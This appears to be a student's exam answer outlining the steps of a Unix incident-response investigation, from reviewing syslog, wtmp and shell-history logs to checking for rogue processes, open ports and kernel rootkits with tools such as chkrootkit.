Q2) Write down the steps involved in Unix system investigation?

1. **Reviewing Pertinent Logs:**

Unix operating systems maintain various log files, located in directories like /var/log or /etc, which
can provide valuable insights during incident response. These logs document system activities such
as logons, startups, shutdowns, and network service events. It's essential to consult operating
system-specific documentation to locate relevant logs, as they may be stored in alternate directories
or even on network servers or security devices.

A. **Network Logging in Unix:**

1. **Syslog Functionality:**

- Syslog captures events from Unix programs and subsystems, controlled through the
/etc/syslog.conf configuration file.

- A syslog daemon, syslogd, logs messages and supports remote logging across networks, offering
flexible logging capabilities.

2. **Remote Syslog Server Logs:**

- Local log files generated by syslogd are typically readable by root only, posing a risk of
unauthorized modification.

- Redundant logging to remote syslog servers ensures log integrity, crucial in detecting and
responding to security breaches.

3. **TCP Wrapper Logging:**

- TCP Wrappers utilize syslog for logging connection attempts to protected services, aiding network
security monitoring.

4. **Other Network Logs:**

- Unix systems maintain service-specific network activity logs, like those for web servers, offering
insights into network activities.

B. **Host Logging:**

1. **Host Operation Logs:**

- Various log files in Unix track host operations, including su command execution, logged-on users,
logon attempts, and cron job execution.
2. **Logged-On User Logs:**

- The utmp or wtmp files store information about currently logged-on users, including username,
terminal used, and login time. Despite their binary format, they may still be vulnerable to
modification.

C. **User Activity Logging in Unix:**

1. **Shell Histories:**

- Command shells like Bourne (sh), Korn (ksh), or Bourne-Again (bash) log all user commands and
their options in history files stored in user home directories.

2. **Sample Excerpt from a Bash History File:**

- Bash maintains a history file recording user commands and options, offering insights into user
behavior and system interactions. Users can access this file to review their command history.

2. PERFORMING KEYWORD SEARCHES

Keyword searches are a critical part of almost every incident response investigation, ranging
from email harassment to remote network compromise cases. Keywords can be a wide
range of ASCII strings, including an attacker’s back door password, a username, MAC
address, or an IP address. You can conduct keyword searches on the logical file structure or
at the physical level, examining the contents of an entire drive. (Logical and physical level
investigations are discussed in Chapter 11, which also covers some popular forensic utilities.)
Here, we’ll concentrate on how to perform string searches using Unix utilities

3. **Review Relevant Files:**

Investigating relevant files involves examining critical system files, configuration files,
and user files for any anomalies or unauthorized modifications. This includes files such
as system configuration files (/etc), user profiles and home directories, log files,
executable binaries, and any other files pertinent to the system's operation. By
reviewing these files, investigators can identify potential security issues, unauthorized
changes, or evidence of malicious activity.

4. **Identify Unauthorized User Accounts or Groups:**

- Detecting unauthorized user accounts or groups is crucial for uncovering potential
security breaches or unauthorized access to the system. Investigators can examine the
system's user database (e.g., /etc/passwd, /etc/shadow) to identify any accounts that do
not belong to legitimate users or were created without proper authorization. Similarly,
checking group memberships and permissions can help identify any unauthorized groups
with elevated privileges.
5 **Identify Rogue Processes:**

- Rogue processes are unauthorized or malicious programs running on the system that may pose
security risks or compromise system integrity. Investigators can use tools like ps (process status) or
top to view a list of running processes and analyze their attributes. Suspicious indicators include
processes with unusual names, unknown or unauthorized process owners, high resource
consumption, suspicious network connections, or processes executing unusual commands.
Identifying and terminating rogue processes is essential for restoring system security and stability.

7 **Check for Unauthorized Access Points:**

- Unauthorized access points, such as open ports or network services, can provide entry points for
attackers to infiltrate the system. Investigators should examine the system's network configuration
and firewall rules to identify any unauthorized or unnecessary services running on the system. Tools
like netstat or nmap can be used to scan for open ports and active network connections. Closing
unnecessary ports and disabling unused services can help mitigate the risk of unauthorized access
and potential security breaches.

8 **Analyze Trust Relationships:**

- Trust relationships refer to the level of trust established between users, groups, systems, and
external entities. Investigating trust relationships involves analyzing user permissions, group
memberships, access control lists (ACLs), and network trust configurations. Investigators should
assess the trustworthiness of user accounts, evaluate privileges granted to users and groups, and
review access controls to sensitive resources. Identifying and addressing trust relationship
vulnerabilities is essential for maintaining system security and preventing unauthorized access or
privilege escalation.

9 **Check for Kernel Module Rootkits:**

- Kernel module rootkits are malicious software components that modify or manipulate the
kernel's behavior to evade detection and gain unauthorized access to the system. Investigators can
use tools like chkrootkit or rkhunter to scan for suspicious kernel modules, hidden processes, or
system anomalies indicative of rootkit activity. Additionally, verifying the integrity of critical system
files and monitoring system calls and kernel logs can help detect and mitigate the impact of kernel-
level compromises. Removing or patching vulnerable kernel modules and implementing secure boot
mechanisms can enhance system resilience against rootkit attacks.